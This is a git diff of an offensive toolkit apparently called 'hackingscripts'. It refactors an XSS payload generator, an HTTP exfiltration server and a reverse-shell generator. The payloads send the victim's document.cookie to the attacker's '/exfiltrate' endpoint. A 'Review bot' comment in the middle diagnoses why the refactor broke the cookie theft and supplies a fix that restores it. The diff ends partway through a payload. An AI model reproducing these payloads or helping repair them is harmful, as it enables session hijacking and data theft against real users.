diff --git a/fileserver.py b/fileserver.py index e5f7972..f23b2c0 100755 --- a/fileserver.py +++ b/fileserver.py @@ -5,12 +5,10 @@ from http.server import BaseHTTPRequestHandler, HTTPServer from urllib.parse import urlparse import threading import requests -import sys import time import os import ssl import util -import xss_handler class FileServerRequestHandler(BaseHTTPRequestHandler): @@ -275,10 +273,6 @@ class HttpFileServer(HTTPServer): self.listen_thread.join() if __name__ == "__main__": - if len(sys.argv) < 2 or sys.argv[1] not in ["shell","dump","proxy","xss"]: - print("Usage: %s [shell,dump,proxy,xss]" % sys.argv[0]) - exit(1) - parser = argparse.ArgumentParser(description="Spawn a temporary http server") parser.add_argument( "action", @@ -327,8 +321,11 @@ if __name__ == "__main__": file_server.forwardRequest("/proxy", url) print("Exfiltrate data using:", file_server.get_full_url("/proxy", ip_address)) elif args.action == "xss": + from xss_handler import generate_payload as generate_xss_payload payload_type = args.payload if args.payload else "img" - xss = xss_handler.generatePayload(payload_type, ip_addr, args.port) + xss = generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address)) + file_server.addFile("/xss", xss) + file_server.dumpRequest("/exfiltrate") print("Exfiltrate data using:") print(xss) diff --git a/rev_shell.py b/rev_shell.py index b18b405..235a9f1 100755 --- a/rev_shell.py +++ b/rev_shell.py 
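Review bot: The new `generate_xss_payload(payload_type, file_server.get_full_url("/exfiltrate", ip_address))` call hands over a bare URL where the removed `xss_handler.generatePayload` built a quoted JS expression (`'http://host:port/?x='+document.cookie`); in the visible part of the new `generate_payload` (xss_handler.py hunk) that `url` is interpolated straight into `onerror="javascript:document.location=%s"`, so unless the truncated remainder of that function re-wraps it, the served payload is neither valid JavaScript nor carries the cookie to the `/exfiltrate` sink registered by `dumpRequest`. Either wrap at the call site, `generate_xss_payload(payload_type, "'%s?x='+document.cookie" % file_server.get_full_url("/exfiltrate", ip_address))`, or make `generate_payload` own the quoting and concatenation, and pin it with a test that the emitted string contains `document.cookie`. Separately, this function-scope import together with the new `from fileserver import HttpFileServer` in xss_handler.py forms a circular import that re-executes fileserver.py as a second module object (`fileserver` next to `__main__`); it works only because the module body has no side effects, which deserves a comment next to the import, e.g. `# local import: xss_handler imports fileserver, so this must not run at module load`. The `if __name__ == "__main__":` block begins and ends outside this hunk.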
@@ -532,8 +532,8 @@ if __name__ == "__main__": parser = argparse.ArgumentParser(description="Reverse shell generator") parser.add_argument(dest="type", type=str, default=None, help="Payload type") - parser.add_argument("--port", type=int, required=False, default=None, help="Listening port") - parser.add_argument("--addr", type=str, required=False, default=util.get_address(), help="Listening address") + parser.add_argument("-p", "--port", type=int, required=False, default=None, help="Listening port") + parser.add_argument("-a", "--addr", type=str, required=False, default=util.get_address(), help="Listening address") args, extra = parser.parse_known_args() listen_port = args.port diff --git a/xss_handler.py b/xss_handler.py index a8ae727..17f1fda 100755 --- a/xss_handler.py +++ b/xss_handler.py 
@@ -1,108 +1,71 @@ #!/usr/bin/env python from hackingscripts import util -import sys -import http.server -import socketserver -from http.server import HTTPServer, BaseHTTPRequestHandler - -# returns http address -def getServerAddress(address, port): - if port == 80: - return "http://%s" % address - else: - return "http://%s:%d" % (address, port) - -# returns js code: 'http://xxxx:yy/?x='+document.cookie -def getCookieAddress(address, port): - return "'%s/?x='+document.cookie" % getServerAddress(address, port) - -def generatePayload(type, address, port): +from fileserver import HttpFileServer +import argparse +import random +def generate_payload(payload_type, url, index=None, **kwargs): payloads = [] - cookieAddress = getCookieAddress(address, port) media_tags = ["img","audio","video","image","body","script","object"] - if type in media_tags: - payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (type, cookieAddress)) + if payload_type in media_tags: + payloads.append('<%s src=1 href=1 onerror="javascript:document.location=%s">' % (payload_type, url)) - if type == "script": - payloads.append('' % cookieAddress) - payloads.append('' % url) + payloads.append('